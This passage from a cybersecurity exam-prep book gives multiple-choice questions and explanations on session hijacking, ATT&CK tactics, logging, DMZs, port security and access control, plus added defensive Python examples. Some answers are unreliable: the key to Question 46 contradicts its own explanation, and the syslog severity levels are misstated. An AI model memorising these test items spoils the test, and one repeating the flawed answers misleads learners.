Question 34. A web developer wants to protect their web application from session hijacking attacks. Which of the following actions should the web developer perform to prevent an attacker from exploiting valid sessions? (Choose all that apply.)
(A) Use of a short random number or string as the session key
(B) Encryption of the data traffic passed between the parties by using SSL/TLS
(C) Use of a long random number or string as the session key
(D) Regenerating the session id after a successful login
(E) Regenerating the session id after a successful logout

Explanation 34. The correct answers are:
1. Encryption of the data traffic passed between the parties by using SSL/TLS
2. Use of a long random number or string as the session key
3. Regenerating the session id after a successful login

Session hijacking is an attack where a user session is taken over by an attacker. A session starts when you log into a service, for example, your banking application, and ends when you log out.

Methods to prevent session hijacking include:
1. Encryption of the data traffic passed between the parties by using SSL/TLS; in particular the session key. This technique is widely relied upon by web-based banks and other e-commerce services because it completely prevents sniffing-style attacks.
2. Use of a long random number or string as the session key. This reduces the risk that an attacker could simply guess a valid session key through trial and error or brute force attacks.
3. Regenerating the session id after a successful login. This prevents session fixation because the attacker does not know the session id of the user after they have logged in.
4. Some services make secondary checks against the identity of the user. For instance, a web server could check with each request made that the IP address of the user matched the one last used during that session.
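Points 2 to 4 of Explanation 34 are applied in the following server-side session store, an added example that is not code from the book. Session ids come from the operating system's CSPRNG (32 bytes, far beyond what trial and error can guess), a login discards the pre-login id and issues a fresh one (so a fixated id is worthless), and an optional secondary check invalidates the session when it is presented from a different IP address than the one last seen. Point 1 (TLS) is a transport setting, so it is out of scope here. The class, its method names and the idle timeout are constructed for this example.

```python
"""Session store applying the countermeasures of Explanation 34
(added example, not from the book): long random ids, id regeneration
on login, idle timeout, and an optional client-IP binding check."""
import secrets
from typing import Dict, Optional


class SessionStore:
    ID_BYTES = 32   # 256 bits from the OS CSPRNG -> 43-char URL-safe id

    def __init__(self, idle_timeout: float = 900.0, bind_ip: bool = True) -> None:
        self._sessions: Dict[str, dict] = {}
        self.idle_timeout = idle_timeout   # seconds of inactivity before expiry
        self.bind_ip = bind_ip             # secondary identity check (point 4)

    def _new_id(self) -> str:
        # secrets, not random: unpredictable ids defeat guessing (point 2)
        return secrets.token_urlsafe(self.ID_BYTES)

    def create(self, client_ip: str, now: float) -> str:
        """Anonymous, pre-login session (e.g. a shopping cart)."""
        sid = self._new_id()
        self._sessions[sid] = {"user": None, "ip": client_ip, "last_seen": now}
        return sid

    def login(self, old_sid: str, user: str, client_ip: str, now: float) -> str:
        """Authenticate the user and rotate the id (point 3): whatever id the
        browser carried before login, planted or not, stops being valid."""
        self._sessions.pop(old_sid, None)
        sid = self._new_id()
        self._sessions[sid] = {"user": user, "ip": client_ip, "last_seen": now}
        return sid

    def resolve(self, sid: str, client_ip: str, now: float) -> Optional[str]:
        """Return the logged-in user for a request, or None when the session
        is unknown, not authenticated, idle too long, or (if bind_ip is on)
        presented from a different IP than the one last used."""
        sess = self._sessions.get(sid)
        if sess is None or sess["user"] is None:
            return None
        if now - sess["last_seen"] > self.idle_timeout:
            del self._sessions[sid]
            return None
        if self.bind_ip and sess["ip"] != client_ip:
            # Point 4: mismatch is treated as a hijack attempt; drop the session
            del self._sessions[sid]
            return None
        sess["last_seen"] = now
        return sess["user"]

    def logout(self, sid: str) -> None:
        """Server-side invalidation, so a copied id is useless after logout."""
        self._sessions.pop(sid, None)
```

Two design points are worth noting. The id is rotated on login but not merely "regenerated after logout" (option E): after logout the session is deleted outright, which is what makes the old id dead. And IP binding is a trade-off, since clients behind changing addresses (mobile networks, some proxies) will be logged out; that is why it is a constructor option rather than always on.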

Question 35. Which of the following are the tactics of the Enterprise ATT&CK framework? (Choose all that apply.)
(A) Privilege Escalation
(B) Defense Evasion
(C) Credential Access
(D) Lateral Movement
(E) Anti-tamper

Explanation 35. The correct answers are:
1. Privilege Escalation
2. Defense Evasion
3. Credential Access
4. Lateral Movement

The Enterprise ATT&CK framework consists of 11 tactics. Consider tactics the "why" part of the ATT&CK equation. What objective did the attacker want to achieve with the compromise?
- Initial Access
- Execution
- Persistence
- Privilege Escalation
- Defense Evasion
- Credential Access
- Discovery
- Lateral Movement
- Collection
- Exfiltration
- Impact

CHAPTER 3
SECURITY OPERATIONS
AND MONITORING

Questions 36-50

Question 36. Which of the following protocols is commonly used to collect information about CPU utilization and bandwidth from network devices and automatically send the administrator an email if a predefined threshold is exceeded?
(A) HTTP
(B) SNMP
(C) DHCP
(D) SMTP

Question 37. You have set up an intrusion detection system (IDS) and suddenly the IDS identifies an activity as an attack, but the activity is acceptable behavior. The state, in this case, is known as:
(A) False-positive
(B) False-negative
(C) Non-credentialed scans
(D) Credentialed scans

Question 38. During a vulnerability scan, you found a serious SQL injection vulnerability in one of your online shops, which has 10,000 daily visitors. The eshop provides 99.999% availability to customers, so it can’t be taken offline to fix the SQL injection vulnerability. Which of the following solutions should you recommend to the eshop administrators until the eshop can be remediated?
(A) Port security
(B) WAF
(C) Honeypot
(D) Sandboxing

Question 39. For efficiency purposes, the developers at your company need to implement a solution to deploy new code releases automatically into the production environment. Which of the following software development methods should the developers implement?
(A) Continuous integration
(B) Continuous monitoring
(C) Continuous delivery
(D) Continuous deployment

Question 40. Which of the following processes is designed to trigger automatic code integration into the main code base instead of developing in isolation and then integrating the changes at the end of the development cycle?
(A) Continuous deployment
(B) Continuous integration
(C) Continuous monitoring
(D) Continuous delivery

Question 41. Which of the following sources of information would provide you with the most accurate information for determining which network service has stopped working on the company’s network?
(A) Event logs
(B) Firewall logs
(C) Syslog
(D) Flow analysis

Question 42. You are conducting a log review to detect the users who have been locked out of their accounts in order to proceed to the recovery stage. Which of the following sources of information would provide you with the most accurate information for determining who has been locked out?
(A) Event logs
(B) Firewall logs
(C) Syslog
(D) Flow analysis

Question 43. You have been tasked to implement a solution to allow users from untrusted networks to access the web server and the mail server while keeping the private network secured and inaccessible. Which of the following do you need to implement to complete the task?
(A) IDS
(B) IPS
(C) DMZ
(D) VPN

Question 44. You have been tasked to improve the wired network security of the company’s network by limiting the number of MAC addresses on a given port. Packets that have a matching MAC address should be considered secure packets and should be forwarded; all other packets (unsecured packets) should be restricted. Which of the following features should you implement to complete the task?
(A) Port security
(B) Network access control
(C) Sinkholing
(D) Sandboxing

Question 45. A new social media app was launched recently that accepts all users worldwide by default. After reviewing the firewall logs, a cybersecurity analyst detects that users from specific countries have conducted a cyber attack on the app. Which of the following access control methods should the analyst recommend to the developers?
(A) Sandboxing
(B) Whitelisting
(C) Port security
(D) Blacklisting

Question 46. What problems can be caused by malicious payloads? (Choose all that apply.)
(A) Activity monitoring
(B) File encryption
(C) File deletion
(D) Malicious file download
(E) Steal online banking details

Question 47. Which of the following options is a dictionary that provides definitions for publicly disclosed cybersecurity vulnerabilities and exposures?
(A) Log aggregation
(B) Security Orchestration, Automation, and Response
(C) Sentiment analysis
(D) Common Vulnerabilities and Exposures

Question 48. A developer is building a new corporate application that needs to be accessed only by selected employees based on their IP addresses. Which of the following access control methods should the developer implement?
(A) Blacklisting
(B) Port security
(C) Whitelisting
(D) Sandboxing

Question 49. Which of the following methods should you use to deal with the huge volume of new threats seen daily?
(A) Intrusion detection system
(B) Network access control
(C) Heuristics analysis
(D) Intrusion prevention system

Question 50. Which of the following actions should you perform to reduce the attack surface area of a given network or system? (Choose all that apply.)
(A) Keep your software up to date
(B) Run a local firewall and don’t open ports you don’t need
(C) Run applications as root or as an administrator
(D) Use TLS for all network communication, even internally
(E) Don't sanitize configurations and inputs

Answers 36-50

Question 36. Which of the following protocols is commonly used to collect information about CPU utilization and bandwidth from network devices and automatically send the administrator an email if a predefined threshold is exceeded?
(A) HTTP
(B) SNMP
(C) DHCP
(D) SMTP

Explanation 36. SNMP is the correct answer. Simple Network Management Protocol (SNMP) is a networking protocol used for the management and monitoring of network-connected devices in Internet Protocol networks. The SNMP protocol is embedded in multiple local devices such as routers, switches, servers, firewalls, and wireless access points accessible using their IP address.

SNMP tools perform many functions that rely on a mix of push and pull communications between network devices and the network management system. At its core set of functions, it can execute read or write commands, such as resetting a password or changing a configuration setting. It can also find how much network bandwidth, CPU and memory are in use. Some SNMP managers can automatically send the administrator an email or text message alert if a predefined threshold is exceeded.

HTTP is incorrect. HTTP is a protocol which allows the fetching of resources, such as HTML documents. It is the foundation of any data exchange on the Web and it is a client-server protocol, which means requests are initiated by the recipient, usually the Web browser.

DHCP is incorrect. A DHCP server is a network server that automatically provides and assigns IP addresses, default gateways and other network parameters to client devices.

SMTP is incorrect. SMTP (Simple Mail Transfer Protocol) is a protocol whose primary purpose is to send, receive, and/or relay outgoing mail between email senders and receivers.

Question 37. You have set up an intrusion detection system (IDS) and suddenly the IDS identifies an activity as an attack, but the activity is acceptable behavior. The state, in this case, is known as:
(A) False-positive
(B) False-negative
(C) Non-credentialed scans
(D) Credentialed scans

Explanation 37. False positive is the correct answer. A false positive state is when the IDS identifies an activity as an attack but the activity is acceptable behavior. A false positive is a false alarm.

False negative is incorrect. A false-negative state is the most serious and dangerous state. This is when the IDS identifies an activity as acceptable when the activity is actually an attack. That is, a false negative is when the IDS fails to catch an attack.

Non-credentialed scans is incorrect. Non-credentialed scans, as the name suggests, do not require credentials and do not get trusted access to the systems they are scanning. While they provide an outsider’s eye view of an environment, they tend to miss most vulnerabilities within a target environment. So, while they can provide some valuable insights to a potential attacker as well as to a security professional trying to gauge the risk from the outside, non-credentialed scans give a very incomplete picture of vulnerability exposure.

Credentialed scans is incorrect. Credentialed scans require logging in with a given set of credentials. These authenticated scans are conducted with a trusted user’s eye view of the environment. Credentialed scans uncover many vulnerabilities that traditional (non-credentialed) scans might overlook.

Question 38. During a vulnerability scan, you found a serious SQL injection vulnerability in one of your online shops, which has 10,000 daily visitors. The eshop provides 99.999% availability to customers, so it can’t be taken offline to fix the SQL injection vulnerability. Which of the following solutions should you recommend to the eshop administrators until the eshop can be remediated?
(A) Port security
(B) WAF
(C) Honeypot
(D) Sandboxing

Explanation 38. WAF is the correct answer. A WAF or Web Application Firewall helps protect web applications by filtering and monitoring HTTP traffic between a web application and the Internet. It typically protects web applications from attacks such as cross-site forgery, cross-site scripting (XSS), file inclusion, and SQL injection, among others. A WAF is a protocol layer 7 defense (in the OSI model), and is not designed to defend against all types of attacks.

Port security is incorrect. Port security helps secure the network by preventing unknown devices from forwarding packets. When a link goes down, all dynamically locked addresses are freed. The port security feature offers the following benefits:
1. You can limit the number of MAC addresses on a given port. Packets that have a matching MAC address (secure packets) are forwarded; all other packets (unsecured packets) are restricted.
2. You can enable port security on a per-port basis.

Honeypot is incorrect. The honeypot looks like a real computer system, with applications and data, fooling cybercriminals into thinking it’s a legitimate target. For example, a honeypot could mimic a company’s customer billing system – a frequent target of attack for criminals who want to find credit card numbers. Once the hackers are in, they can be tracked, and their behavior assessed for clues on how to make the real network more secure.

Sandboxing is incorrect. Sandboxing is a software management strategy that isolates applications from critical system resources and other programs. It provides an extra layer of security that prevents malware or harmful applications from negatively affecting your system.

Question 39. For efficiency purposes, the developers at your company need to implement a solution to deploy new code releases automatically into the production environment. Which of the following software development methods should the developers implement?
(A) Continuous integration
(B) Continuous monitoring
(C) Continuous delivery
(D) Continuous deployment

Explanation 39. Continuous deployment is the correct answer. Continuous deployment is a software development method that releases or deploys software automatically into the production environment. In this model, no one manually checks the code and pushes it into your app.

Obviously, you have to know whether or not the code being deployed is free from bugs and errors before it’s in the hands of end-users — your customers. But this, too, can be done by software. Code is automatically tested for issues, and if none are found, then the code is deployed.

Continuous integration is incorrect. Continuous Integration (CI) is a development practice where developers integrate code into a shared repository frequently, preferably several times a day. Each integration can then be verified by an automated build and automated tests. While automated testing is not strictly part of CI, it is typically implied.

Continuous integration is designed to trigger automatic code integration into the main code base instead of developing in isolation and then integrating the changes at the end of the development cycle.

Continuous monitoring is incorrect. Continuous monitoring provides security and operations analysts with real-time feedback on the overall health of IT infrastructure, including networks and applications deployed in the cloud.

The goal of continuous monitoring is to increase the visibility and transparency of network activity, especially suspicious network activity that could indicate a security breach, and to mitigate the risk of cyber attacks with a timely alert system that triggers a rapid incident response.

Continuous delivery is incorrect. Continuous delivery is an ongoing DevOps practice of building, testing, and delivering improvements to software code and user environments with the help of automated tools. The key outcome of the continuous delivery (CD) paradigm is code that is always in a deployable state.

Question 40. Which of the following processes is designed to trigger automatic code integration into the main code base instead of developing in isolation and then integrating the changes at the end of the development cycle?
(A) Continuous deployment
(B) Continuous integration
(C) Continuous monitoring
(D) Continuous delivery

Explanation 40. Continuous integration is correct. Continuous Integration (CI) is a development practice where developers integrate code into a shared repository frequently, preferably several times a day. Each integration can then be verified by an automated build and automated tests. While automated testing is not strictly part of CI, it is typically implied.

Continuous integration is designed to trigger automatic code integration into the main code base instead of developing in isolation and then integrating the changes at the end of the development cycle.

Continuous deployment is incorrect. Continuous deployment is a software development method that releases or deploys software automatically into the production environment. In this model, no one manually checks the code and pushes it into your app.

Obviously, you have to know whether or not the code being deployed is free from bugs and errors before it’s in the hands of end-users — your customers. But this, too, can be done by software. Code is automatically tested for issues, and if none are found, then the code is deployed.

Continuous monitoring is incorrect. Continuous monitoring provides security and operations analysts with real-time feedback on the overall health of IT infrastructure, including networks and applications deployed in the cloud.

The goal of continuous monitoring is to increase the visibility and transparency of network activity, especially suspicious network activity that could indicate a security breach, and to mitigate the risk of cyber attacks with a timely alert system that triggers a rapid incident response.

Continuous delivery is incorrect. Continuous delivery is an ongoing DevOps practice of building, testing, and delivering improvements to software code and user environments with the help of automated tools. The key outcome of the continuous delivery (CD) paradigm is code that is always in a deployable state.

Question 41. Which of the following sources of information would provide you with the most accurate information to use in determining which network service has stopped working on the company’s network?
(A) Event logs
(B) Firewall logs
(C) Syslog
(D) Flow analysis

Explanation 41. Syslog is the correct answer. Syslog is a message logging standard by which almost any device or application can send data about status, events, diagnostics, and more.

Syslog messages have a built-in severity level, ranging from level 0, an Emergency, to level 5, a Warning, and then on to level 6 and level 7, which are Informational and Debugging, respectively.

Event logs is incorrect. An event log is a more basic resource that stores different types of information based on specific events. These events include:
1. Failed password attempts
2. Locked accounts
3. Network login sessions
4. Application errors
5. Unexpected application closures
Event logs can be used to troubleshoot problems with security management, application installations, and more.

Firewall logs is incorrect. To be most effective, a firewall ruleset must be augmented with a successful logging feature. The logging feature documents how the firewall deals with traffic types. These logs offer insights into, for example, source and destination IP addresses, protocols, and port numbers.

Flow analysis is incorrect. Network flow analysis is the art of studying the traffic on a computer network. Understanding the ways to export flow and collect and analyze data separates good network administrators from great ones.

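The following is an added example, not part of the book’s explanation, showing how the severity level described above is actually carried in a syslog message: the leading `<PRI>` value encodes facility and severity together (PRI = facility × 8 + severity), so an analyst hunting for a service that has stopped working can decode it and keep only messages at Warning or worse. The sample lines are constructed for this example, and the severity and facility names follow the tables in RFC 5424 (where 4 is Warning and 5 is Notice).

```python
"""Decode syslog priority values and filter messages by severity."""
import re
from typing import Optional

# Severity names as defined in RFC 5424, Table 2 (0 is the most severe).
SEVERITIES = ["Emergency", "Alert", "Critical", "Error",
              "Warning", "Notice", "Informational", "Debug"]

# Facility names as defined in RFC 5424, Table 1 (0..23).
FACILITIES = ["kern", "user", "mail", "daemon", "auth", "syslog", "lpr",
              "news", "uucp", "cron", "authpriv", "ftp", "ntp", "audit",
              "alert", "clock"] + [f"local{n}" for n in range(8)]

_PRI_RE = re.compile(r"^<(\d{1,3})>(.*)$", re.DOTALL)


def parse_syslog(line: str) -> Optional[dict]:
    """Split a raw syslog line into its PRI fields and message body.

    PRI = facility * 8 + severity, so facility is PRI >> 3 and severity
    is PRI & 7. Returns None for lines without a valid PRI header.
    """
    match = _PRI_RE.match(line)
    if not match:
        return None
    pri = int(match.group(1))
    if pri > 191:          # 23 * 8 + 7 is the largest legal value
        return None
    facility, severity = pri >> 3, pri & 7
    return {
        "pri": pri,
        "facility": facility,
        "facility_name": FACILITIES[facility],
        "severity": severity,
        "severity_name": SEVERITIES[severity],
        "message": match.group(2).strip(),
    }


def at_least(lines, severity_name: str) -> list:
    """Return parsed messages at least as serious as severity_name.

    Lower numbers are more severe, so "at least Warning" means <= 4.
    """
    threshold = SEVERITIES.index(severity_name)
    hits = []
    for line in lines:
        rec = parse_syslog(line)
        if rec and rec["severity"] <= threshold:
            hits.append(rec)
    return hits


# Constructed sample lines (not from any real host).
SAMPLE = [
    "<30>Mar  3 08:15:02 web01 sshd[812]: Server listening on 0.0.0.0 port 22.",
    "<27>Mar  3 08:16:40 web01 systemd[1]: nginx.service: Main process exited, code=exited, status=1/FAILURE",
    "<26>Mar  3 08:16:40 web01 systemd[1]: nginx.service: Failed with result 'exit-code'.",
    "<38>Mar  3 08:17:01 web01 sudo: alice : TTY=pts/0 ; COMMAND=/bin/systemctl status nginx",
    "<6>Mar  3 08:17:05 web01 kernel: eth0: link is up",
    "garbage line without a PRI header",
]

if __name__ == "__main__":
    # Only the two nginx failure messages survive a "Warning or worse" filter.
    for rec in at_least(SAMPLE, "Warning"):
        print(f'{rec["facility_name"]:>8}.{rec["severity_name"]:<13} {rec["message"]}')
```

Filtering on severity alone is a first cut: the two nginx lines come from the daemon facility at Error and Critical, while the sshd start-up notice and the sudo entry are Informational and fall out of the result.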
Question 42. You are conducting a log review to detect the users who have been locked out of their accounts, in order to proceed to the recovery stage. Which of the following sources of information would provide you with the most accurate information to use in determining who has been locked out?
(A) Event logs
(B) Firewall logs
(C) Syslog
(D) Flow analysis

Explanation 42. Event logs is the correct answer. An event log is a more basic resource that stores different types of information based on specific events. These events include:
1. Failed password attempts
2. Locked accounts
3. Network login sessions
4. Application errors
5. Unexpected application closures
Event logs can be used to troubleshoot problems with security management, application installations, and more.

Firewall logs is incorrect. To be most effective, a firewall ruleset must be augmented with a successful logging feature. The logging feature documents how the firewall deals with traffic types. These logs offer insights into, for example, source and destination IP addresses, protocols, and port numbers.

Syslog is incorrect. Syslog is a message logging standard by which almost any device or application can send data about status, events, diagnostics, and more.

Syslog messages have a built-in severity level, ranging from level 0, an Emergency, to level 5, a Warning, and then on to level 6 and level 7, which are Informational and Debugging, respectively.

Flow analysis is incorrect. Network flow analysis is the art of studying the traffic on a computer network. Understanding the ways to export flow and collect and analyze data separates good network administrators from great ones.

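The following is an added example, not part of the book’s explanation, of the review described in Question 42: reading lockout and unlock events from an event log and working out which accounts are still locked before the recovery step. It assumes a CSV export of a Windows Security log using the real event IDs 4625 (failed logon), 4740 (account locked out) and 4767 (account unlocked); the records themselves are constructed for the example. Ordering by time matters, because a lockout followed by an unlock is no longer a lockout.

```python
"""Work out which accounts are currently locked out from an event log."""
import csv
from datetime import datetime
from io import StringIO

# Windows Security log event IDs (the IDs are real; the records below are
# constructed for this example).
EVT_FAILED_LOGON = 4625      # An account failed to log on
EVT_ACCOUNT_LOCKED = 4740    # A user account was locked out
EVT_ACCOUNT_UNLOCKED = 4767  # A user account was unlocked

# Constructed export of a Security event log, one record per line.
SAMPLE_LOG = """\
time,event_id,account,source
2021-05-04T08:01:10,4625,bob,10.0.0.21
2021-05-04T08:01:14,4625,bob,10.0.0.21
2021-05-04T08:01:19,4625,bob,10.0.0.21
2021-05-04T08:01:23,4625,bob,10.0.0.21
2021-05-04T08:01:27,4625,bob,10.0.0.21
2021-05-04T08:01:27,4740,bob,10.0.0.21
2021-05-04T08:05:00,4625,carol,10.0.0.33
2021-05-04T08:12:41,4740,dave,10.0.0.40
2021-05-04T08:30:05,4767,dave,DC01
2021-05-04T09:02:11,4740,erin,10.0.0.51
"""


def read_events(text):
    """Parse the CSV export and sort records by time."""
    rows = list(csv.DictReader(StringIO(text)))
    for row in rows:
        row["time"] = datetime.fromisoformat(row["time"])
        row["event_id"] = int(row["event_id"])
    rows.sort(key=lambda r: r["time"])  # stable sort keeps same-second order
    return rows


def locked_accounts(events):
    """Return {account: lockout_time} for every account whose most recent
    lock/unlock event is a lockout."""
    state = {}
    for ev in events:
        if ev["event_id"] == EVT_ACCOUNT_LOCKED:
            state[ev["account"]] = ev["time"]
        elif ev["event_id"] == EVT_ACCOUNT_UNLOCKED:
            state.pop(ev["account"], None)
    return state


def failures_before_lockout(events, account):
    """Count the failed logons (and their source addresses) that preceded an
    account's lockout, so the analyst can tell a mistyped password from a
    password-guessing attempt before unlocking. Returns (0, set()) when the
    account is not locked."""
    lock_time = locked_accounts(events).get(account)
    if lock_time is None:
        return 0, set()
    fails = [ev for ev in events
             if ev["event_id"] == EVT_FAILED_LOGON
             and ev["account"] == account
             and ev["time"] <= lock_time]
    return len(fails), {ev["source"] for ev in fails}


if __name__ == "__main__":
    events = read_events(SAMPLE_LOG)
    for account, when in sorted(locked_accounts(events).items()):
        count, sources = failures_before_lockout(events, account)
        print(f"{account}: locked at {when:%H:%M:%S}, "
              f"{count} failed logons from {sorted(sources) or 'n/a'}")
```

On the sample data, bob and erin are still locked, dave was unlocked by the domain controller, and carol only failed once and was never locked. The failure count and source address are what the recovery decision needs: five failures from a single workstation looks like a forgotten password, whereas failures from many sources would warrant investigation before the unlock.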
Question 43. You have been tasked to implement a solution to allow users from untrusted networks to access the Web Server and the Mail Server while keeping the private network secured and inaccessible. Which of the following do you need to implement to complete the task?
(A) IDS
(B) IPS
(C) DMZ
(D) VPN

Explanation 43. DMZ is the correct answer. A DMZ, short for a demilitarized zone, is a network (physical or logical) used to connect hosts that provide an interface to an untrusted external network – usually the internet – while keeping the internal, private network – usually the corporate network – separated and isolated from the external network.

The ultimate goal of a DMZ is to allow access to resources from untrusted networks while keeping the private network secured. Resources commonly placed in the DMZ include Web servers, Mail servers, FTP servers, and VoIP servers.

IDS is incorrect. An intrusion detection system (IDS) is a device or software application that monitors a network for malicious activity or policy violations.

IPS is incorrect. An intrusion prevention system (IPS) is a form of network security that works to detect and prevent identified threats. Intrusion prevention systems continuously monitor your network, looking for possible malicious incidents and capturing information about them.

Virtual private network is incorrect. A virtual private network, or VPN, is an encrypted connection over the Internet from a device to a network. The encrypted connection helps ensure that sensitive data is safely transmitted.

Question 44. You have been tasked to improve the wired network security of the company’s network by limiting the number of MAC addresses on a given port. Packets that have a matching MAC address should be considered secure packets and should be forwarded; all other packets (unsecured packets) should be restricted. Which of the following features should you implement to complete the task?
(A) Port security
(B) Network access control
(C) Sinkholing
(D) Sandboxing

Explanation 44. Port security is the correct answer. Port security helps secure the network by preventing unknown devices from forwarding packets. When a link goes down, all dynamically locked addresses are freed. The port security feature offers the following benefits:
- You can limit the number of MAC addresses on a given port. Packets that have a matching MAC address (secure packets) are forwarded; all other packets (unsecure packets) are restricted.
- You can enable port security on a per-port basis.

Network access control is incorrect. Network access control is the act of keeping unauthorized users and devices out of a private network. Organizations that give certain devices or users from outside of the organization occasional access to the network can use network access control to ensure that these devices meet corporate security compliance regulations.

Sinkholing is incorrect. Sinkholing is a technique for manipulating data flow in a network; you redirect traffic from its intended destination to the server of your choosing. It can be used maliciously, to steer legitimate traffic away from its intended recipient.

Sandboxing is incorrect. Sandboxing is a software management strategy that isolates applications from critical system resources and other programs. It provides an extra layer of security that prevents malware or harmful applications from negatively affecting your system.
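
The following is an added example, not part of the book’s explanation, that models the port security behaviour described above so the rules can be exercised: a per-port maximum of secure MAC addresses, secure frames forwarded, unknown frames restricted, and dynamically learned addresses freed when the link goes down. The three violation modes are named after the ones Cisco switches offer (protect, restrict, shutdown); the class and the MAC addresses are constructed for this example and do not correspond to any vendor’s API.

```python
"""Toy model of switch port security: a per-port limit on learned MAC
addresses with protect / restrict / shutdown violation handling."""
from collections import OrderedDict


class PortSecurity:
    VIOLATION_MODES = ("protect", "restrict", "shutdown")

    def __init__(self, max_addresses=1, violation="restrict", sticky=False):
        if violation not in self.VIOLATION_MODES:
            raise ValueError("violation must be protect, restrict or shutdown")
        self.max_addresses = max_addresses
        self.violation = violation
        self.sticky = sticky              # sticky: learned MACs survive link-down
        self.secure_macs = OrderedDict()  # mac -> "static" | "dynamic" | "sticky"
        self.violations = 0
        self.err_disabled = False

    def add_static(self, mac):
        """Configure a secure MAC by hand; it counts toward the maximum."""
        if len(self.secure_macs) >= self.max_addresses:
            raise ValueError("secure address table is full")
        self.secure_macs[mac.lower()] = "static"

    def ingress(self, mac):
        """Decide what happens to a frame arriving from `mac`: 'forward' or 'drop'."""
        mac = mac.lower()
        if self.err_disabled:
            return "drop"                 # port was shut down after a violation
        if mac in self.secure_macs:
            return "forward"              # secure packet
        if len(self.secure_macs) < self.max_addresses:
            # Room left: learn the address dynamically and forward.
            self.secure_macs[mac] = "sticky" if self.sticky else "dynamic"
            return "forward"
        # Unknown MAC and the table is full: this is a violation.
        if self.violation == "restrict":
            self.violations += 1          # dropped and counted (a switch would also log it)
        elif self.violation == "shutdown":
            self.violations += 1
            self.err_disabled = True      # whole port goes err-disabled
        return "drop"                     # protect mode drops silently

    def link_down(self):
        """When the link goes down, dynamically learned addresses are freed;
        static and sticky entries are kept."""
        for mac, kind in list(self.secure_macs.items()):
            if kind == "dynamic":
                del self.secure_macs[mac]

    def clear_err_disable(self):
        """Administrative recovery of a port shut down by a violation."""
        self.err_disabled = False
        self.violations = 0


if __name__ == "__main__":
    port = PortSecurity(max_addresses=2, violation="restrict")
    for mac in ("00:11:22:33:44:55", "00:11:22:33:44:66", "de:ad:be:ef:00:01"):
        print(mac, "->", port.ingress(mac))
    print("violations:", port.violations)
```

Running the block shows the first two addresses being learned and forwarded and the third being dropped as a violation. The choice of mode matters operationally: restrict keeps the port up and gives the analyst a counter to alert on, while shutdown takes the port down until someone clears it, which is safer but turns a single rogue device into an outage for the legitimate host on the same port.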

Question 45. A new social media app was launched recently that accepts all users worldwide by default. A cybersecurity analyst, after reviewing the firewall logs, detects that users from specific countries have conducted a cyber attack on the app. Which of the following access control methods should the analyst recommend to the developers?
(A) Sandboxing
(B) Whitelisting
(C) Port security
(D) Blacklisting

Explanation 45. Blacklisting is the correct answer. Blacklisting means accepting most entities, but excluding those you believe to be malicious or otherwise wish to avoid. Traditionally, blacklisting has been the most common approach security teams use for securing their networks or environments.

Whitelisting is incorrect. Whitelisting refers to the practice of blocking all entities except those that are explicitly allowed to communicate with you or your infrastructure. Whitelisting makes more sense in situations where you do not want a service to be public.

Port Security is incorrect. Port Security helps secure the network by preventing unknown devices from forwarding packets. When a link goes down, all dynamically locked addresses are freed. The port security feature offers the following benefits:
1. You can limit the number of MAC addresses on a given port. Packets that have a matching MAC address (secure packets) are forwarded; all other packets (unsecure packets) are restricted.
2. You can enable port security on a per-port basis.

Sandboxing is incorrect. Sandboxing is a software management strategy that isolates applications from critical system resources and other programs. It provides an extra layer of security that prevents malware or harmful applications from negatively affecting your system.

Question 46. What problems can be caused by malicious payloads? (Choose all that apply.)
(A) Activity monitoring
(B) File encryption
(C) File deletion
(D) Malicious file download
(E) Steal online banking details

Explanation 46. The correct answers are:
1. Activity monitoring
2. File encryption
3. File deletion
4. Malicious file download

A malicious payload is an attack component responsible for executing an activity to harm the target. Some common examples of malicious payloads are worms, ransomware, and other malware that arrive on computers by clicking bad links or downloading harmful attachments.

Malicious payloads can cause several problems, including:
1. Data theft: Most cybercriminals steal sensitive data, such as login details and financial information, to sell on the Dark Web or use in a data breach.
2. Activity monitoring: Once a malicious payload, such as spyware, is executed, a hacker can monitor all of a user’s activities.
3. File encryption: Ransomware is typically used as a malicious payload to encrypt or change the access to data contained within a target computer.
4. File deletion: The ExploreZip worm, discovered in 1999, is a malicious payload designed to delete files from an infected Windows computer.
5. Malicious file download: Malicious payloads can also download other malware onto an infected computer to render it unusable. Trojan-Downloader is an example of this.
6. Unwanted ad display: Once triggered, adware can persistently display pop-up ads. One such malicious payload is DollarRevenue.
7. Running unauthorized background processes: Many malicious payloads run silently in the background to spy on the user or slow down a computer’s performance. They are typically backdoors that leave systems under the control of attackers.

Question 47. Which of the following options is a dictionary that provides definitions for publicly disclosed cybersecurity vulnerabilities and exposures?
(A) Log aggregation
(B) Security Orchestration, Automation, and Response
(C) Sentiment analysis
(D) Common Vulnerabilities and Exposures

Explanation 47. Common Vulnerabilities and Exposures is the correct answer. Common Vulnerabilities and Exposures (CVE) is a dictionary that provides definitions for publicly disclosed cybersecurity vulnerabilities and exposures. The goal of CVE is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services) with these definitions. CVE Entries consist of an identification number, a description, and at least one public reference.

Log aggregation is incorrect. Log aggregation is a software function that consolidates log data from throughout the IT infrastructure into a single centralized platform where it can be reviewed and analyzed. Log aggregation is just one aspect of an overall log management process that produces real-time insights into application security and performance.

Sentiment analysis is incorrect. Sentiment analysis helps data analysts within large enterprises gauge public opinion, conduct nuanced market research, monitor brand and product reputation, and understand customer experiences.

Security Orchestration, Automation and Response (SOAR) is incorrect. SOAR is a solution stack of compatible software programs that allow an organization to collect data about security threats from multiple sources and respond to low-level security events without human assistance. The goal of using a SOAR stack is to improve the efficiency of physical and digital security operations.

Question 48. A developer is building a new corporate application that needs to be accessed only by selected employees based on their IP addresses. Which of the following access control methods should the developer implement?
(A) Blacklisting
(B) Port security
(C) Whitelisting
(D) Sandboxing

Explanation 48. Whitelisting is the correct answer. Whitelisting refers to the practice of blocking all entities except those that are explicitly allowed to communicate with you or your infrastructure. Whitelisting makes more sense in situations where you do not want a service to be public.

Blacklisting is incorrect. Blacklisting means accepting most entities, but excluding those you believe to be malicious or otherwise wish to avoid.

Port Security is incorrect. Port Security helps secure the network by preventing unknown devices from forwarding packets. When a link goes down, all dynamically locked addresses are freed. The port security feature offers the following benefits:
1. You can limit the number of MAC addresses on a given port. Packets that have a matching MAC address (secure packets) are forwarded; all other packets (unsecure packets) are restricted.
2. You can enable port security on a per-port basis.

Sandboxing is incorrect. Sandboxing is a software management strategy that isolates applications from critical system resources and other programs. It provides an extra layer of security that prevents malware or harmful applications from negatively affecting your system.

